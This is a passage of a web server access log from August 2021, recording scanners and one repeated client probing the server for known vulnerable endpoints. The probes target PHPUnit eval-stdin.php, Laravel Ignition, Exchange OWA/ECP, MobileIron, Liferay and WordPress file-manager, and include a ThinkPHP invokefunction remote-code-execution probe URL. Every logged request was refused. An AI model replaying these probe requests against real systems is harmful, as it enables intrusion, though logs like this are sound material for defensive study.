192.241.220.136] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [07/Aug/2021:23:10:58 +0000] 400 - - http localhost "-" [Client 78.128.112.18] [Length 154] [Gzip -] "-" "-" [07/Aug/2021:23:27:18 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [07/Aug/2021:23:27:18 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [07/Aug/2021:23:27:22 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [07/Aug/2021:23:27:22 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [07/Aug/2021:23:27:25 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [07/Aug/2021:23:27:25 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [07/Aug/2021:23:27:27 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [07/Aug/2021:23:27:31 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [07/Aug/2021:23:27:31 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [07/Aug/2021:23:27:33 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [07/Aug/2021:23:43:01 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.141.34] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [08/Aug/2021:00:44:28 +0000] 444 - GET https 64.22.31.253 "/" [Client 184.105.139.68] [Length 0] [Gzip -] "-" "-" [08/Aug/2021:02:06:33 +0000] 444 - GET https 64.22.31.253 "/" [Client 162.221.192.26] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [08/Aug/2021:03:28:10 +0000] 444 - GET https 64.22.31.253 "/" [Client 23.251.102.74] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [08/Aug/2021:10:04:57 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.218.100] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [08/Aug/2021:11:09:14 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.209.162] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [08/Aug/2021:16:46:43 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 192.241.212.18] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [08/Aug/2021:16:57:53 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.201.201] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [08/Aug/2021:17:00:56 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [08/Aug/2021:17:00:56 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [08/Aug/2021:17:00:56 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [08/Aug/2021:17:00:56 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [08/Aug/2021:17:00:56 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [08/Aug/2021:17:00:56 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [08/Aug/2021:17:09:05 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 192.241.218.15] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [08/Aug/2021:18:01:14 +0000] 444 - GET https 64.22.31.253 "/cgi-bin/config.exp" [Client 193.118.53.202] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [08/Aug/2021:18:03:49 +0000] 444 - GET https smtp.moralanimal.net "/" [Client 124.126.78.178] [Length 0] [Gzip -] "Mozilla/5.0 (Linux; U; Android 9; zh-cn; RMX1901 Build/QKQ1.190918.001) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/70.0.3538.80 Mobile Safari/537.36 HeyTapBrowser/40.7.22.1" "-" [08/Aug/2021:18:27:48 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.218.140] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [08/Aug/2021:21:09:17 +0000] 400 - GET http 64.22.31.253 "/manager/text/list" [Client 192.241.214.121] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [08/Aug/2021:21:19:06 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [08/Aug/2021:21:19:07 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [08/Aug/2021:21:19:07 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [08/Aug/2021:21:19:10 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [08/Aug/2021:21:19:11 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [08/Aug/2021:21:19:13 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [08/Aug/2021:21:19:13 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [08/Aug/2021:21:19:15 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [08/Aug/2021:21:19:17 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [08/Aug/2021:21:19:17 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [08/Aug/2021:21:19:20 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [08/Aug/2021:22:59:48 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.214.87] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [09/Aug/2021:00:02:59 +0000] 400 - GET http 64.22.31.253 "/manager/html" [Client 192.241.220.120] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [09/Aug/2021:01:02:09 +0000] 444 - GET https 64.22.31.253 "/" [Client 216.218.206.68] [Length 0] [Gzip -] "-" "-" [09/Aug/2021:03:13:56 +0000] 444 - GET https 64.22.31.253 "/" [Client 34.222.187.14] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36" "-" [09/Aug/2021:03:25:33 +0000] 444 - GET https tpm.moralanimal.net "/" [Client 208.110.85.69] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36" "http://www.google.com.hk" [09/Aug/2021:03:36:13 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.133.58] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [09/Aug/2021:04:43:45 +0000] 444 - GET https trilium.moralanimal.net "/" [Client 208.110.85.69] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36" "http://www.google.com.hk" [09/Aug/2021:06:54:50 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.106.29.210] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0" "-" [09/Aug/2021:07:53:55 +0000] 400 - - https localhost "-" [Client 76.72.172.165] [Length 0] [Gzip -] "-" "-" [09/Aug/2021:08:27:28 +0000] 444 - GET https whoami.moralanimal.net "/" [Client 142.54.177.4] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36" "http://www.google.com.hk" [09/Aug/2021:09:00:02 +0000] 444 - GET https 64.22.31.253 "/" [Client 147.182.198.8] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [09/Aug/2021:10:07:31 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.216.212] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [09/Aug/2021:10:26:01 +0000] 400 - GET http localhost "/" [Client 80.82.70.228] [Length 252] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0 Safari/605.1.15" "-" [09/Aug/2021:10:26:26 +0000] 400 - GET http 64.22.31.253 "/" [Client 5.8.10.202] [Length 252] [Gzip -] "fasthttp" "-" [09/Aug/2021:10:26:26 +0000] 444 - GET https 64.22.31.253 "/aaa9" [Client 5.8.10.202] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" [09/Aug/2021:10:26:26 +0000] 400 - GET http 64.22.31.253 "/aaa9" [Client 5.8.10.202] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" [09/Aug/2021:10:26:27 +0000] 444 - GET https 64.22.31.253 "/aab9" [Client 5.8.10.202] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" [09/Aug/2021:10:26:27 +0000] 400 - GET http 64.22.31.253 "/aab9" [Client 5.8.10.202] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" [09/Aug/2021:10:26:40 +0000] 444 - GET https 64.22.31.253 "/aaa9" [Client 5.8.10.202] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" [09/Aug/2021:10:26:40 +0000] 400 - GET http 64.22.31.253 "/aaa9" [Client 5.8.10.202] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" [09/Aug/2021:10:26:41 +0000] 444 - GET https 64.22.31.253 "/aab9" [Client 5.8.10.202] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" [09/Aug/2021:10:26:41 +0000] 400 - GET http 64.22.31.253 "/aab9" [Client 5.8.10.202] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" [09/Aug/2021:12:12:16 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [09/Aug/2021:12:12:17 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [09/Aug/2021:12:12:17 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [09/Aug/2021:12:12:20 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [09/Aug/2021:12:12:21 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [09/Aug/2021:12:12:22 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [09/Aug/2021:12:12:25 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [09/Aug/2021:12:12:25 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [09/Aug/2021:12:12:27 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [09/Aug/2021:12:12:27 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [09/Aug/2021:12:12:28 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [09/Aug/2021:13:47:18 +0000] 444 - GET https 64.22.31.253 "/" [Client 143.110.177.251] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" [09/Aug/2021:16:02:09 +0000] 444 - GET https 64.22.31.253 "/" [Client 71.6.232.7] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36" "-" [09/Aug/2021:16:26:08 +0000] 444 - GET https 64.22.31.253 "/" [Client 162.142.125.55] [Length 0] [Gzip -] "-" "-" [09/Aug/2021:16:26:10 +0000] 400 - GET http 64.22.31.253 "/" [Client 162.142.125.55] [Length 252] [Gzip -] "-" "-" [09/Aug/2021:16:26:10 +0000] 400 - GET http 64.22.31.253 "/" [Client 162.142.125.55] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [09/Aug/2021:16:46:37 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 192.241.216.115] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [09/Aug/2021:16:59:18 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.215.208] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [09/Aug/2021:17:00:50 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [09/Aug/2021:17:00:50 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [09/Aug/2021:17:00:50 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [09/Aug/2021:17:00:50 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [09/Aug/2021:17:00:50 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [09/Aug/2021:17:00:50 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [09/Aug/2021:17:08:34 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 192.241.194.56] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [09/Aug/2021:18:28:56 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.220.233] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [09/Aug/2021:19:00:55 +0000] 444 - GET https 64.22.31.253 "/" [Client 80.82.77.192] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" "-" [09/Aug/2021:19:05:51 +0000] 400 - GET http 64.22.31.253 "/" [Client 80.82.77.192] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [09/Aug/2021:20:17:59 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.118.53.194] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [09/Aug/2021:22:11:53 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.215.65] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [09/Aug/2021:23:00:28 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.220.119] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [09/Aug/2021:23:36:49 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 212.192.246.80] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [10/Aug/2021:00:29:17 +0000] 444 - GET https 64.22.31.253 "/" [Client 92.118.160.25] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [10/Aug/2021:00:56:18 +0000] 444 - GET https 64.22.31.253 "/" [Client 64.62.197.92] [Length 0] [Gzip -] "-" "-" [10/Aug/2021:01:08:06 +0000] 400 - GET http localhost "/0bef" [Client 172.105.89.161] [Length 252] [Gzip -] "-" "-" [10/Aug/2021:01:16:36 +0000] 444 - GET https 64.22.31.253 "/Telerik.Web.UI.WebResource.axd?type=rau" [Client 162.221.192.26] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [10/Aug/2021:04:12:08 +0000] 444 - GET https 64.22.31.253 "/remote/login" [Client 128.14.134.134] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [10/Aug/2021:06:05:52 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.248.133.53] [Length 0] [Gzip -] "-" "-" [10/Aug/2021:06:05:53 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.53] [Length 252] [Gzip -] "-" "-" [10/Aug/2021:06:05:53 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.53] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [10/Aug/2021:06:18:55 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [10/Aug/2021:06:18:55 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [10/Aug/2021:06:18:57 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [10/Aug/2021:06:18:58 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [10/Aug/2021:06:18:59 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [10/Aug/2021:06:19:00 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [10/Aug/2021:06:19:02 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [10/Aug/2021:06:19:02 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [10/Aug/2021:06:19:04 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 